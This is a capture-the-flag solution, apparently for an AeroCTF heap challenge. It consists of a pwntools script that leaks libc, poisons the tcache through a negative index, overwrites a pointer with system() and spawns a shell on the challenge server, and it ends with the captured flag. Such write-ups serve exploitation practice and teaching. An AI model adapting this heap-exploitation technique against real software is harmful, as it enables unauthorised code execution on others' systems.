Tags: tcache heap
Rating:
```python
from pwn import *
r = remote("tasks.aeroctf.com",33039)
def add(s):
r.sendlineafter("> ","1")
r.sendafter("password: ",s)
def view(id):
r.sendlineafter("> ","2")
r.sendlineafter("id: ",str(id))
def delete(id):
r.sendlineafter("> ","4")
r.sendlineafter("id: ",str(id))
def delall():
r.sendlineafter("> ","5")
r.sendafter("name: ","/bin/sh\x00")
r.sendafter("secret: ",p64(0x404020))
for _ in range(16):
print("add"+str(_))
add("a")
view(16)
r.recvuntil("Value: ")
res = r.recvline()[:-1]
#print(res)
#print(len(res))
puts = u64(res.ljust(8,'\x00'))
#print(hex(puts))
libc = puts-0x73f30
system = libc+0x46ed0
print(hex(libc))
print(hex(system))
for i in range(16):
print("del"+str(15-i))
delete(15-i)
#delall()
#add("a")
#add("magic")
for _ in range(15):
print("add"+str(_))
add("a")
#r.interactive()
for i in range(7):
print("del"+str(i))
delete(i)
add("magic")
#r.sendlineafter("> ","3")
#print(r.recvall())
#r.interactive()
delete(9)
delete(8)
delete(7)
delete(-1)
for _ in range(7):
print("add"+str(_))
add("a")
add(p64(0x404100))
add("magic")
#r.interactive()
add(p64(system))
add(p64(system))
r.interactive()
#Aero{a9b57185b3799a0bb4c0bdd01156ae2d5eeea046513a4faf1d51e114df91679e}
```
